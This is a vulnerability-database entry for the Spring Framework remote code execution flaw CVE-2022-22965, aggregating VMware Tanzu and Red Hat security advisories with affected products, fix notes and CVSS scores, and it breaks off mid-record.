ID CVE-2022-22965 Type cve Reporter security@vmware.com Modified 2022-05-19T14:21:00
Description
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
{"vmware": [{"lastseen": "2022-04-14T16:19:16", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "VMSA-2022-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:13:59", "description": "##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs \n\n * VMware Tanzu Operations Manager\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T00:00:00", "id": "VMSA-2022-0010.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-04T02:32:49", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-30T00:00:00", "id": "VMSA-2022-0010.5", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.5.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:09:47", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "VMSA-2022-0010.4", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.4.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T08:32:24", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T00:00:00", "id": "VMSA-2022-0010.3", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.3.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2022-04-14T17:40:12", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis asynchronous security patch is an update to Red Hat Process Automation Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:05:38", "type": "redhat", "title": "(RHSA-2022:1378) Low: Red Hat Process Automation Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:06:00", "id": "RHSA-2022:1378", "href": "https://access.redhat.com/errata/RHSA-2022:1378", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-13T15:01:13", "description": "This release of Red Hat Fuse 7.10.2 serves as a replacement for Red Hat Fuse 7.10.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ [fuse-7] (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T14:42:27", "type": "redhat", "title": "(RHSA-2022:1360) Low: Red Hat Fuse 7.10.2 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T14:42:43", "id": "RHSA-2022:1360", "href": "https://access.redhat.com/errata/RHSA-2022:1360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-14T17:42:22", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and business optimization for solving planning problems. It automates business decisions and makes that logic available to the entire business. \n\nThis asynchronous security patch is an update to Red Hat Decision Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:29:33", "type": "redhat", "title": "(RHSA-2022:1379) Low: Red Hat Decision Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:29:56", "id": "RHSA-2022:1379", "href": "https://access.redhat.com/errata/RHSA-2022:1379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T11:40:10", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.9.4 serves as a replacement for Red Hat AMQ Broker 7.9.3, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:16", "type": "redhat", "title": "(RHSA-2022:1627) Low: Red Hat AMQ Broker 7.9.4 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:46", "id": "RHSA-2022:1627", "href": "https://access.redhat.com/errata/RHSA-2022:1627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T19:28:33", "description": "A micro version update (from 1.6.4 to 1.6.5) is now available for Red Hat Camel K that includes CVE fixes in the base images, which are documented in the Release Notes document linked in the References section.\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:28:41", "type": "redhat", "title": "(RHSA-2022:1333) Low: Red Hat Integration Camel-K 1.6.5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T18:29:00", "id": "RHSA-2022:1333", "href": "https://access.redhat.com/errata/RHSA-2022:1333", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T14:45:38", "description": "Red Hat Integration - Camel Extensions for Quarkus 2.2.1-1 serves as a replacement for 2.2.1 and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T14:02:32", "type": "redhat", "title": "(RHSA-2022:1306) Low: Red Hat Integration Camel Extensions for Quarkus 2.2.1-1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T14:02:57", "id": "RHSA-2022:1306", "href": "https://access.redhat.com/errata/RHSA-2022:1306", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T11:42:55", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.8.6 serves as a replacement for Red Hat AMQ Broker 7.8.5, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:11", "type": "redhat", "title": "(RHSA-2022:1626) Low: Red Hat AMQ Broker 7.8.6 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 